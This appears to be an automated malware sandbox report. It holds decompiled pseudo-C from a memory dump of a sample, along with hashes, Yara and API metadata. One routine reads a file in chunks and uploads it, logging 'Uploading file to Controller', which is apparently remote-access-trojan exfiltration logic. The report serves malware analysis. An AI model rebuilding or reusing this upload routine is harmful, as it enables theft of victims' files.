                                                                                                																										 *(_t221 + _t290) = E00440628(_t262, _t95, 1);
                                                                                                																										E004414D5(0);
                                                                                                																										_t323 = _t323 + 0xc;
                                                                                                																										__eflags =  *(_t221 + _t290);
                                                                                                																										if( *(_t221 + _t290) == 0) {
                                                                                                																											goto L102;
                                                                                                																										} else {
                                                                                                																											_t180 = E0043CAAC( *(_t221 + _t290), _v16,  *_t290);
                                                                                                																											_t323 = _t323 + 0xc;
                                                                                                																											__eflags = _t180;
                                                                                                																											if(_t180 != 0) {
                                                                                                																												L103:
                                                                                                																												_push(0);
                                                                                                																												_push(0);
                                                                                                																												_push(0);
                                                                                                																												_push(0);
                                                                                                																												_push(0);
                                                                                                																												E00437736();
                                                                                                																												asm("int3");
                                                                                                																												_push(_t317);
                                                                                                																												_t318 = _t323;
                                                                                                																												_push(_t262);
                                                                                                																												_push(_t262);
                                                                                                																												_push(_t290);
                                                                                                																												_t291 = _v128;
                                                                                                																												__eflags = _t291;
                                                                                                																												if(_t291 != 0) {
                                                                                                																													_push(_t221);
                                                                                                																													_t223 = 0;
                                                                                                																													_t156 = _t291;
                                                                                                																													_t263 = 0;
                                                                                                																													_v20 = 0;
                                                                                                																													_push(_t305);
                                                                                                																													__eflags =  *_t291;
                                                                                                																													if( *_t291 != 0) {
                                                                                                																														do {
                                                                                                																															_t156 =  &(_t156[1]);
                                                                                                																															_t263 = _t263 + 1;
                                                                                                																															__eflags =  *_t156;
                                                                                                																														} while ( *_t156 != 0);
                                                                                                																													}
                                                                                                																													_t104 = _t263 + 1; // 0x2
                                                                                                																													_t306 = E00440628(_t263, _t104, 4);
                                                                                                																													__eflags = _t306;
                                                                                                																													if(_t306 == 0) {
                                                                                                																														L119:
                                                                                                																														E00440C29(_t223, _t284, _t291, _t306);
                                                                                                																														goto L120;
                                                                                                																													} else {
                                                                                                																														__eflags =  *_t291 - _t223;
                                                                                                																														if( *_t291 == _t223) {
                                                                                                																															L117:
                                                                                                																															E004414D5(_t223);
                                                                                                																															_t167 = _t306;
                                                                                                																															goto L118;
                                                                                                																														} else {
                                                                                                																															_t223 = _t306 - _t291;
                                                                                                																															__eflags = _t223;
                                                                                                																															do {
                                                                                                																																_t267 =  *_t291;
                                                                                                																																_t105 = _t267 + 2; // 0x6
                                                                                                																																_t284 = _t105;
                                                                                                																																do {
                                                                                                																																	_t168 =  *_t267;
                                                                                                																																	_t267 = _t267 + 2;
                                                                                                																																	__eflags = _t168 - _v20;
                                                                                                																																} while (_t168 != _v20);
                                                                                                																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
                                                                                                																																_v24 = _t107;
                                                                                                																																 *(_t223 + _t291) = E00440628(_t267 - _t284 >> 1, _t107, 2);
                                                                                                																																E004414D5(0);
                                                                                                																																_t323 = _t323 + 0xc;
                                                                                                																																__eflags =  *(_t223 + _t291);
                                                                                                																																if( *(_t223 + _t291) == 0) {
                                                                                                																																	goto L119;
                                                                                                																																} else {
                                                                                                																																	_t173 = E004428B4( *(_t223 + _t291), _v24,  *_t291);
                                                                                                																																	_t323 = _t323 + 0xc;
                                                                                                																																	__eflags = _t173;
                                                                                                																																	if(_t173 != 0) {
                                                                                                																																		L120:
                                                                                                																																		_push(0);
                                                                                                																																		_push(0);
                                                                                                																																		_push(0);
                                                                                                																																		_push(0);
                                                                                                																																		_push(0);
                                                                                                																																		E00437736();
                                                                                                																																		asm("int3");
                                                                                                																																		_push(_t318);
                                                                                                																																		_push(_t223);
                                                                                                																																		_push(_t306);
                                                                                                																																		_push(_t291);
                                                                                                																																		_t292 =  *0x46d4d0; // 0x65eb40
                                                                                                																																		_t307 = _t292;
                                                                                                																																		__eflags =  *_t292;
                                                                                                																																		if( *_t292 == 0) {
                                                                                                																																			L127:
                                                                                                																																			_t308 = _t307 - _t292;
                                                                                                																																			__eflags = _t308;
                                                                                                																																			_t310 =  ~(_t308 >> 2);
                                                                                                																																		} else {
                                                                                                																																			_t225 = _v8;
                                                                                                																																			do {
                                                                                                																																				_t163 = E004446BC(_v12,  *_t307, _t225);
                                                                                                																																				_t323 = _t323 + 0xc;
                                                                                                																																				__eflags = _t163;
                                                                                                																																				if(_t163 != 0) {
                                                                                                																																					goto L126;
                                                                                                																																				} else {
                                                                                                																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                                                                                                																																					__eflags = _t165 - 0x3d;
                                                                                                																																					if(_t165 == 0x3d) {
                                                                                                																																						L129:
                                                                                                																																						_t310 = _t307 - _t292 >> 2;
                                                                                                																																					} else {
                                                                                                																																						__eflags = _t165;
                                                                                                																																						if(_t165 == 0) {
                                                                                                																																							goto L129;
                                                                                                																																						} else {
                                                                                                																																							goto L126;
                                                                                                																																						}
                                                                                                																																					}
                                                                                                																																				}
                                                                                                																																				goto L128;
                                                                                                																																				L126:
                                                                                                																																				_t307 =  &(_t307[1]);
                                                                                                																																				__eflags =  *_t307;
                                                                                                																																			} while ( *_t307 != 0);
                                                                                                																																			goto L127;
                                                                                                																																		}
                                                                                                																																		L128:
                                                                                                																																		return _t310;
                                                                                                																																	} else {
                                                                                                																																		goto L115;
                                                                                                																																	}
                                                                                                																																}
                                                                                                																																goto L130;
                                                                                                																																L115:
                                                                                                																																_t291 = _t291 + 4;
                                                                                                																																__eflags =  *_t291 - _t173;
                                                                                                																															} while ( *_t291 != _t173);
                                                                                                																															_t223 = 0;
                                                                                                																															__eflags = 0;
                                                                                                																															goto L117;
                                                                                                																														}
                                                                                                																													}
                                                                                                																												} else {
                                                                                                																													_t167 = 0;
                                                                                                																													L118:
                                                                                                																													return _t167;
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												goto L98;
                                                                                                																											}
                                                                                                																										}
                                                                                                																										goto L130;
                                                                                                																										L98:
                                                                                                																										_t290 = _t290 + 4;
                                                                                                																										__eflags =  *_t290 - _t180;
                                                                                                																									} while ( *_t290 != _t180);
                                                                                                																									goto L100;
                                                                                                																								}
                                                                                                																							}
                                                                                                																						} else {
                                                                                                																							_t175 = 0;
                                                                                                																							L101:
                                                                                                																							return _t175;
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t274 =  &(_t304[_v20 + 1]);
                                                                                                																						 *(_t274 - 2) = _t148;
                                                                                                																						asm("sbb eax, eax");
                                                                                                																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                                                                                                																						__eflags = _t185;
                                                                                                																						if(_t185 == 0) {
                                                                                                																							_t186 = E00438932();
                                                                                                																							_t221 = _t221 | 0xffffffff;
                                                                                                																							__eflags = _t221;
                                                                                                																							 *_t186 = 0x2a;
                                                                                                																						}
                                                                                                																						goto L85;
                                                                                                																					}
                                                                                                																				}
                                                                                                																			}
                                                                                                																		}
                                                                                                																	}
                                                                                                																} else {
                                                                                                																	_t191 =  *0x46d4d0; // 0x65eb40
                                                                                                																	__eflags = _a4 - _t221;
                                                                                                																	if(_a4 == _t221) {
                                                                                                																		L58:
                                                                                                																		__eflags = _t246;
                                                                                                																		if(_t246 != 0) {
                                                                                                																			goto L56;
                                                                                                																		} else {
                                                                                                																			__eflags = _t191;
                                                                                                																			if(_t191 != 0) {
                                                                                                																				L62:
                                                                                                																				 *0x46d4d4 = E00440628(_t246, 1, 4);
                                                                                                																				E004414D5(_t221);
                                                                                                																				_t322 = _t322 + 0xc;
                                                                                                																				goto L63;
                                                                                                																			} else {
                                                                                                																				 *0x46d4d0 = E00440628(_t246, 1, 4);
                                                                                                																				E004414D5(_t221);
                                                                                                																				_t322 = _t322 + 0xc;
                                                                                                																				__eflags =  *0x46d4d0 - _t221; // 0x65eb40
                                                                                                																				if(__eflags == 0) {
                                                                                                																					goto L55;
                                                                                                																				} else {
                                                                                                																					_t302 =  *0x46d4d4; // 0x676fa0
                                                                                                																					__eflags = _t302;
                                                                                                																					if(_t302 != 0) {
                                                                                                																						goto L64;
                                                                                                																					} else {
                                                                                                																						goto L62;
                                                                                                																					}
                                                                                                																				}
                                                                                                																			}
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		__eflags = _t191;
                                                                                                																		if(_t191 == 0) {
                                                                                                																			goto L58;
                                                                                                																		} else {
                                                                                                																			_t196 = L0043E6DB(_t221);
                                                                                                																			__eflags = _t196;
                                                                                                																			if(_t196 != 0) {
                                                                                                																				L63:
                                                                                                																				_t302 =  *0x46d4d4; // 0x676fa0
                                                                                                																				__eflags = _t302;
                                                                                                																				if(_t302 == 0) {
                                                                                                																					L55:
                                                                                                																					_t221 = _t220 | 0xffffffff;
                                                                                                																					__eflags = _t221;
                                                                                                																					L56:
                                                                                                																					E004414D5(_t288);
                                                                                                																					_t136 = _t221;
                                                                                                																					goto L57;
                                                                                                																				} else {
                                                                                                																					goto L64;
                                                                                                																				}
                                                                                                																			} else {
                                                                                                																				goto L54;
                                                                                                																			}
                                                                                                																		}
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													} else {
                                                                                                														_t197 = E00438932();
                                                                                                														 *_t197 = 0x16;
                                                                                                														_t136 = _t197 | 0xffffffff;
                                                                                                														L57:
                                                                                                														return _t136;
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t280 = _v16 + 1 + _t300 - _a4;
                                                                                                													asm("sbb eax, eax");
                                                                                                													 *(_t280 - 1) = _t218;
                                                                                                													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                                                                                                													__eflags = _t204;
                                                                                                													if(_t204 == 0) {
                                                                                                														_t205 = E00438932();
                                                                                                														_t218 = _t218 | 0xffffffff;
                                                                                                														__eflags = _t218;
                                                                                                														 *_t205 = 0x2a;
                                                                                                													}
                                                                                                													goto L42;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								__eflags = _a8;
                                                                                                								if(_a8 == 0) {
                                                                                                									L14:
                                                                                                									__eflags = _t120;
                                                                                                									if(_t120 == 0) {
                                                                                                										 *0x46d4d0 = E00440628(_t231, 1, 4);
                                                                                                										E004414D5(_t218);
                                                                                                										_t298 =  *0x46d4d0; // 0x65eb40
                                                                                                										_t320 = _t320 + 0xc;
                                                                                                										__eflags = _t298;
                                                                                                										if(_t298 == 0) {
                                                                                                											goto L11;
                                                                                                										} else {
                                                                                                											__eflags =  *0x46d4d4 - _t218; // 0x676fa0
                                                                                                											if(__eflags != 0) {
                                                                                                												goto L20;
                                                                                                											} else {
                                                                                                												 *0x46d4d4 = E00440628(_t231, 1, 4);
                                                                                                												E004414D5(_t218);
                                                                                                												_t320 = _t320 + 0xc;
                                                                                                												__eflags =  *0x46d4d4 - _t218; // 0x676fa0
                                                                                                												if(__eflags == 0) {
                                                                                                													goto L11;
                                                                                                												} else {
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t218 = 0;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									__eflags =  *0x46d4d4 - _t218; // 0x676fa0
                                                                                                									if(__eflags == 0) {
                                                                                                										goto L14;
                                                                                                									} else {
                                                                                                										_t214 = L0043E6D6(0);
                                                                                                										__eflags = _t214;
                                                                                                										if(_t214 != 0) {
                                                                                                											L19:
                                                                                                											_t298 =  *0x46d4d0; // 0x65eb40
                                                                                                											L20:
                                                                                                											__eflags = _t298;
                                                                                                											if(_t298 == 0) {
                                                                                                												L11:
                                                                                                												_t218 = _t217 | 0xffffffff;
                                                                                                												__eflags = _t218;
                                                                                                												L12:
                                                                                                												E004414D5(_t286);
                                                                                                												_t119 = _t218;
                                                                                                												goto L13;
                                                                                                											} else {
                                                                                                												goto L21;
                                                                                                											}
                                                                                                										} else {
                                                                                                											goto L10;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t215 = E00438932();
                                                                                                					 *_t215 = 0x16;
                                                                                                					_t119 = _t215 | 0xffffffff;
                                                                                                					L13:
                                                                                                					return _t119;
                                                                                                				}
                                                                                                				L130:
                                                                                                			}








































































































                                                                                                0x00448c4a
                                                                                                0x00000000
                                                                                                0x00448c4c
                                                                                                0x00448c4f
                                                                                                0x00448c55
                                                                                                0x00448c58
                                                                                                0x00448c5b
                                                                                                0x00448c6f
                                                                                                0x00448c6f
                                                                                                0x00448c72
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448c6b
                                                                                                0x00448c6e
                                                                                                0x00448c6e
                                                                                                0x00448c6e
                                                                                                0x00448c74
                                                                                                0x00448c76
                                                                                                0x00448c7e
                                                                                                0x00448c80
                                                                                                0x00448c85
                                                                                                0x00448c88
                                                                                                0x00448c8a
                                                                                                0x00448c8c
                                                                                                0x00448ce0
                                                                                                0x00448ce0
                                                                                                0x00448ce0
                                                                                                0x00448c5d
                                                                                                0x00448c5d
                                                                                                0x00448c60
                                                                                                0x00448c62
                                                                                                0x00448c62
                                                                                                0x00448ce6
                                                                                                0x00448ce9
                                                                                                0x00000000
                                                                                                0x00448cef
                                                                                                0x00448cef
                                                                                                0x00448cf1
                                                                                                0x00448cf1
                                                                                                0x00448cf4
                                                                                                0x00448cf4
                                                                                                0x00448cf7
                                                                                                0x00448cfa
                                                                                                0x00448cfa
                                                                                                0x00448d05
                                                                                                0x00448d09
                                                                                                0x00448d11
                                                                                                0x00448d14
                                                                                                0x00448d15
                                                                                                0x00448d17
                                                                                                0x00448d5e
                                                                                                0x00448d5f
                                                                                                0x00000000
                                                                                                0x00448d19
                                                                                                0x00448d21
                                                                                                0x00448d26
                                                                                                0x00448d29
                                                                                                0x00448d2b
                                                                                                0x00448d6a
                                                                                                0x00448d6b
                                                                                                0x00448d6c
                                                                                                0x00448d6d
                                                                                                0x00448d6e
                                                                                                0x00448d6f
                                                                                                0x00448d74
                                                                                                0x00448d77
                                                                                                0x00448d78
                                                                                                0x00448d7b
                                                                                                0x00448d7c
                                                                                                0x00448d7f
                                                                                                0x00448d81
                                                                                                0x00448d8a
                                                                                                0x00448d8c
                                                                                                0x00448d8e
                                                                                                0x00448d90
                                                                                                0x00448d92
                                                                                                0x00448d92
                                                                                                0x00448d95
                                                                                                0x00448d96
                                                                                                0x00448d96
                                                                                                0x00448d92
                                                                                                0x00448d9c
                                                                                                0x00448da7
                                                                                                0x00448daa
                                                                                                0x00448dab
                                                                                                0x00448dad
                                                                                                0x00448e14
                                                                                                0x00448e14
                                                                                                0x00000000
                                                                                                0x00448daf
                                                                                                0x00448daf
                                                                                                0x00448db2
                                                                                                0x00448e04
                                                                                                0x00448e06
                                                                                                0x00448e0c
                                                                                                0x00000000
                                                                                                0x00448db4
                                                                                                0x00448db4
                                                                                                0x00448db7
                                                                                                0x00448db7
                                                                                                0x00448db9
                                                                                                0x00448db9
                                                                                                0x00448dbb
                                                                                                0x00448dbb
                                                                                                0x00448dbe
                                                                                                0x00448dbe
                                                                                                0x00448dc0
                                                                                                0x00448dc1
                                                                                                0x00448dc1
                                                                                                0x00448dc5
                                                                                                0x00448dc9
                                                                                                0x00448dcd
                                                                                                0x00448dd7
                                                                                                0x00448dda
                                                                                                0x00448ddf
                                                                                                0x00448de2
                                                                                                0x00448de6
                                                                                                0x00000000
                                                                                                0x00448de8
                                                                                                0x00448df0
                                                                                                0x00448df5
                                                                                                0x00448df8
                                                                                                0x00448dfa
                                                                                                0x00448e19
                                                                                                0x00448e1b
                                                                                                0x00448e1c
                                                                                                0x00448e1d
                                                                                                0x00448e1e
                                                                                                0x00448e1f
                                                                                                0x00448e20
                                                                                                0x00448e25
                                                                                                0x00448e28
                                                                                                0x00448e29
                                                                                                0x00448e2b
                                                                                                0x00448e2c
                                                                                                0x00448e2d
                                                                                                0x00448e2e
                                                                                                0x00448e31
                                                                                                0x00448e33
                                                                                                0x00448e3c
                                                                                                0x00448e3d
                                                                                                0x00448e3f
                                                                                                0x00448e41
                                                                                                0x00448e43
                                                                                                0x00448e46
                                                                                                0x00448e47
                                                                                                0x00448e49
                                                                                                0x00448e4b
                                                                                                0x00448e4b
                                                                                                0x00448e4e
                                                                                                0x00448e4f
                                                                                                0x00448e4f
                                                                                                0x00448e4b
                                                                                                0x00448e53
                                                                                                0x00448e5e
                                                                                                0x00448e62
                                                                                                0x00448e64
                                                                                                0x00448ed2
                                                                                                0x00448ed2
                                                                                                0x00000000
                                                                                                0x00448e66
                                                                                                0x00448e66
                                                                                                0x00448e68
                                                                                                0x00448ec2
                                                                                                0x00448ec3
                                                                                                0x00448ec9
                                                                                                0x00000000
                                                                                                0x00448e6a
                                                                                                0x00448e6c
                                                                                                0x00448e6c
                                                                                                0x00448e6e
                                                                                                0x00448e6e
                                                                                                0x00448e70
                                                                                                0x00448e70
                                                                                                0x00448e73
                                                                                                0x00448e73
                                                                                                0x00448e76
                                                                                                0x00448e79
                                                                                                0x00448e79
                                                                                                0x00448e85
                                                                                                0x00448e89
                                                                                                0x00448e91
                                                                                                0x00448e97
                                                                                                0x00448e9c
                                                                                                0x00448e9f
                                                                                                0x00448ea3
                                                                                                0x00000000
                                                                                                0x00448ea5
                                                                                                0x00448ead
                                                                                                0x00448eb2
                                                                                                0x00448eb5
                                                                                                0x00448eb7
                                                                                                0x00448ed7
                                                                                                0x00448ed9
                                                                                                0x00448eda
                                                                                                0x00448edb
                                                                                                0x00448edc
                                                                                                0x00448edd
                                                                                                0x00448ede
                                                                                                0x00448ee3
                                                                                                0x00448ee6
                                                                                                0x00448ee9
                                                                                                0x00448eea
                                                                                                0x00448eeb
                                                                                                0x00448eec
                                                                                                0x00448ef2
                                                                                                0x00448ef4
                                                                                                0x00448ef7
                                                                                                0x00448f23
                                                                                                0x00448f23
                                                                                                0x00448f23
                                                                                                0x00448f28
                                                                                                0x00448ef9
                                                                                                0x00448ef9
                                                                                                0x00448efc
                                                                                                0x00448f02
                                                                                                0x00448f07
                                                                                                0x00448f0a
                                                                                                0x00448f0c
                                                                                                0x00000000
                                                                                                0x00448f0e
                                                                                                0x00448f10
                                                                                                0x00448f13
                                                                                                0x00448f15
                                                                                                0x00448f31
                                                                                                0x00448f33
                                                                                                0x00448f17
                                                                                                0x00448f17
                                                                                                0x00448f19
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448f19
                                                                                                0x00448f15
                                                                                                0x00000000
                                                                                                0x00448f1b
                                                                                                0x00448f1b
                                                                                                0x00448f1e
                                                                                                0x00448f1e
                                                                                                0x00000000
                                                                                                0x00448efc
                                                                                                0x00448f2a
                                                                                                0x00448f30
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448eb7
                                                                                                0x00000000
                                                                                                0x00448eb9
                                                                                                0x00448eb9
                                                                                                0x00448ebc
                                                                                                0x00448ebc
                                                                                                0x00448ec0
                                                                                                0x00448ec0
                                                                                                0x00000000
                                                                                                0x00448ec0
                                                                                                0x00448e68
                                                                                                0x00448e35
                                                                                                0x00448e35
                                                                                                0x00448ecd
                                                                                                0x00448ed1

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                • String ID: @e
                                                                                                • API String ID: 3899193279-2994471477
                                                                                                • Opcode ID: 51c7febfffcb914fc004e73cb01bdd06029dbff5ce19e3670ad97b46950789d5
                                                                                                • Instruction ID: 6b887ec94c18f0ca6b4e7bee99f304fb77620e93cea1234fee426abd34741106
                                                                                                • Opcode Fuzzy Hash: 51c7febfffcb914fc004e73cb01bdd06029dbff5ce19e3670ad97b46950789d5
                                                                                                • Instruction Fuzzy Hash: 05D126B1E017016FFB20AF658881A7EBBA4EF05364F04016FF945AB381EF79A841875D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 81%
                                                                                                			E0040663F(intOrPtr __ecx, union _LARGE_INTEGER __edx, void* __eflags, WCHAR* _a4, char _a8, char _a32, char _a56) {
                                                                                                				void* _v12;
                                                                                                				union _LARGE_INTEGER _v16;
                                                                                                				union _LARGE_INTEGER _v20;
                                                                                                				union _LARGE_INTEGER* _v24;
                                                                                                				long _v28;
                                                                                                				long _v32;
                                                                                                				long _v36;
                                                                                                				struct _OVERLAPPED* _v40;
                                                                                                				signed int _v44;
                                                                                                				signed int _v48;
                                                                                                				struct %anon52 _v56;
                                                                                                				union _LARGE_INTEGER _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				struct %anon52 _v72;
                                                                                                				union _LARGE_INTEGER _v76;
                                                                                                				intOrPtr _v80;
                                                                                                				char _v104;
                                                                                                				char _v128;
                                                                                                				char _v152;
                                                                                                				char _v176;
                                                                                                				char _v200;
                                                                                                				char _v224;
                                                                                                				char _v248;
                                                                                                				char _v272;
                                                                                                				char _v296;
                                                                                                				char _v320;
                                                                                                				char _v344;
                                                                                                				char _v368;
                                                                                                				char _v392;
                                                                                                				char _v416;
                                                                                                				char _v440;
                                                                                                				char _v464;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				struct %anon52 _t115;
                                                                                                				void* _t117;
                                                                                                				void* _t124;
                                                                                                				long _t134;
                                                                                                				void* _t135;
                                                                                                				signed int _t136;
                                                                                                				struct _OVERLAPPED* _t143;
                                                                                                				signed int _t146;
                                                                                                				void* _t152;
                                                                                                				void* _t154;
                                                                                                				void* _t155;
                                                                                                				void* _t171;
                                                                                                				long _t196;
                                                                                                				struct %anon52 _t201;
                                                                                                				void* _t214;
                                                                                                				union _LARGE_INTEGER _t275;
                                                                                                				union _LARGE_INTEGER _t277;
                                                                                                				void* _t291;
                                                                                                				intOrPtr _t292;
                                                                                                				void* _t296;
                                                                                                				void* _t297;
                                                                                                				void* _t298;
                                                                                                				void* _t299;
                                                                                                
                                                                                                				_t275 = __edx;
                                                                                                				_t292 = __ecx;
                                                                                                				_v64 = __ecx;
                                                                                                				E00404943(__ecx);
                                                                                                				E004049DE(__ecx, __ecx, __ecx);
                                                                                                				_v32 = 0x186a0;
                                                                                                				_v60.LowPart = 0;
                                                                                                				_t291 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                                				_t305 = _t291 - 0xffffffff;
                                                                                                				if(_t291 != 0xffffffff) {
                                                                                                					_v72.LowPart = 0;
                                                                                                					_v72.HighPart.LowPart = 0;
                                                                                                					__imp__GetFileSizeEx(_t291,  &_v72);
                                                                                                					_t201 = _v72.HighPart;
                                                                                                					_t115 = _v72;
                                                                                                					_v44 = _t201;
                                                                                                					_v20.LowPart = _t201;
                                                                                                					_v48 = _t115;
                                                                                                					_v16.LowPart = _t115;
                                                                                                					E00404260(0,  &_v104, _a4);
                                                                                                					_t117 = E00417D2B( &_v128,  &_v104);
                                                                                                					_t297 = _t296 - 0x18;
                                                                                                					_t277 = "Uploading file to Controller: ";
                                                                                                					E004053F2(0, _t297, _t277, _t291, __eflags, _t117);
                                                                                                					_t298 = _t297 - 0x14;
                                                                                                					E00402076(0, _t298, "i");
                                                                                                					E00417670(0, _t291);
                                                                                                					_t299 = _t298 + 0x30;
                                                                                                					E00401FB9();
                                                                                                					E00401EE2();
                                                                                                					_v36 = 1;
                                                                                                					_v40 = 0;
                                                                                                					_t124 = E00451A20(_v48, _v44, 0x186a0, 0);
                                                                                                					_t208 = _t277;
                                                                                                					asm("xorps xmm0, xmm0");
                                                                                                					_v80 = _t124 + 1;
                                                                                                					asm("adc ecx, ebx");
                                                                                                					asm("movlpd [ebp-0x34], xmm0");
                                                                                                					_v76.LowPart = _t277;
                                                                                                					__eflags = _v44;
                                                                                                					if(__eflags < 0) {
                                                                                                						L17:
                                                                                                						CloseHandle(_t291);
                                                                                                						E00404F18(_t292, _t277);
                                                                                                						_t196 = 1;
                                                                                                					} else {
                                                                                                						if(__eflags > 0) {
                                                                                                							L5:
                                                                                                							_t275 = 0;
                                                                                                							_v24 = _v56.HighPart.LowPart;
                                                                                                							_v56.HighPart.LowPart = _v56;
                                                                                                							_t134 = 0x186a0;
                                                                                                							goto L6;
                                                                                                							do {
                                                                                                								do {
                                                                                                									L6:
                                                                                                									__eflags = _t275 - _v20.LowPart;
                                                                                                									if(__eflags >= 0) {
                                                                                                										_t208 = _v16.LowPart;
                                                                                                										if(__eflags > 0) {
                                                                                                											L9:
                                                                                                											_t134 = _t208;
                                                                                                											_t208 = _v20.LowPart;
                                                                                                											_v32 = _t134;
                                                                                                											_v60.LowPart = _v20.LowPart;
                                                                                                										} else {
                                                                                                											__eflags = _t134 - _t208;
                                                                                                											if(__eflags > 0) {
                                                                                                												goto L9;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									_push(_t134);
                                                                                                									_t135 = E0043021B(_t208, _t275, _t292, __eflags);
                                                                                                									_push(0);
                                                                                                									_v12 = _t135;
                                                                                                									_v28 = 0;
                                                                                                									_t136 = SetFilePointerEx(_t291, _v56.HighPart.LowPart, _v24, 0);
                                                                                                									__eflags = _t136;
                                                                                                									if(_t136 == 0) {
                                                                                                										_t300 = _t299 - 0x18;
                                                                                                										_t214 = _t299 - 0x18;
                                                                                                										_push("SetFilePointerEx error");
                                                                                                										goto L23;
                                                                                                									} else {
                                                                                                										_t146 = ReadFile(_t291, _v12, _v32,  &_v28, 0);
                                                                                                										__eflags = _t146;
                                                                                                										if(_t146 == 0) {
                                                                                                											_t300 = _t299 - 0x18;
                                                                                                											_t214 = _t299 - 0x18;
                                                                                                											_push("ReadFile error");
                                                                                                											L23:
                                                                                                											E00402076(0, _t214);
                                                                                                											E00402076(0, _t300 - 0x18, "E");
                                                                                                											E00417670(0, _t291);
                                                                                                											E00430224(_v12);
                                                                                                											CloseHandle(_t291);
                                                                                                											goto L24;
                                                                                                										} else {
                                                                                                											__eflags = _v28;
                                                                                                											if(__eflags == 0) {
                                                                                                												E00430224(_v12);
                                                                                                												CloseHandle(_t291);
                                                                                                												E00404F18(_t292, _t275);
                                                                                                												_t143 = 1;
                                                                                                												goto L25;
                                                                                                											} else {
                                                                                                												E00404260(0,  &_v104, _a4);
                                                                                                												_t152 = E0040209D(0,  &_v464, _t275, __eflags, _v12, _v28);
                                                                                                												_t299 = _t299 - 0x18;
                                                                                                												_t154 = E00417C50(0x46e250,  &_v440, _v80, _v76);
                                                                                                												_t155 = E00417C50(0x46e250,  &_v416, _v36, _v40);
                                                                                                												_t290 = E00402F85(0x46e250,  &_v128, E00402F85(0x46e250,  &_v152, E00402F85(0x46e250,  &_v176, E00402F0F( &_v200, E00402F85(0x46e250,  &_v224, E00402F0F( &_v248, E00402F85(0x46e250,  &_v272, E00402F85(0x46e250,  &_v296, E00402F85(0x46e250,  &_v320, E00402F85(0x46e250,  &_v344, E00402F85(0x46e250,  &_v368, E00417D8C(0x46e250,  &_v392,  &_v104), __eflags, 0x46e250), __eflags,  &_a8), __eflags, 0x46e250), __eflags,  &_a32), __eflags, 0x46e250), _t155), __eflags, 0x46e250), _t154), __eflags, 0x46e250), __eflags,  &_a56), __eflags, 0x46e250);
                                                                                                												E00402F0F(_t299, _t169, _t152);
                                                                                                												_t294 = _v64;
                                                                                                												_push(0x52);
                                                                                                												_t171 = E00404BB7(0x46e250, _v64, _t169, __eflags);
                                                                                                												__eflags = _t171 - 0xffffffff;
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												E00401EE2();
                                                                                                												__eflags = 0x46e200 | _t171 == 0xffffffff;
                                                                                                												if((0x46e200 | _t171 == 0xffffffff) != 0) {
                                                                                                													E00404F18(_t294, _t290);
                                                                                                													CloseHandle(_t291);
                                                                                                													E00430224(_v12);
                                                                                                													_t196 = 0;
                                                                                                												} else {
                                                                                                													goto L14;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									goto L18;
                                                                                                									L14:
                                                                                                									E00430224(_v12);
                                                                                                									_t134 = _v32;
                                                                                                									_v16.LowPart = _v16 - _t134;
                                                                                                									_t275 = _v60;
                                                                                                									asm("sbb [ebp-0x10], edx");
                                                                                                									_v36 = _v36 + 1;
                                                                                                									_push(0);
                                                                                                									_pop(0);
                                                                                                									asm("adc [ebp-0x24], ebx");
                                                                                                									_t208 = _v56.HighPart.LowPart + _t134;
                                                                                                									_v56.HighPart = _t208;
                                                                                                									asm("adc [ebp-0x14], edx");
                                                                                                									__eflags = _v24 - _v44;
                                                                                                									_t292 = _v64;
                                                                                                								} while (__eflags < 0);
                                                                                                								if(__eflags > 0) {
                                                                                                									goto L17;
                                                                                                								} else {
                                                                                                									goto L16;
                                                                                                								}
                                                                                                								goto L18;
                                                                                                								L16:
                                                                                                								__eflags = _t208 - _v48;
                                                                                                							} while (_t208 < _v48);
                                                                                                							goto L17;
                                                                                                						} else {
                                                                                                							__eflags = _v48;
                                                                                                							if(_v48 <= 0) {
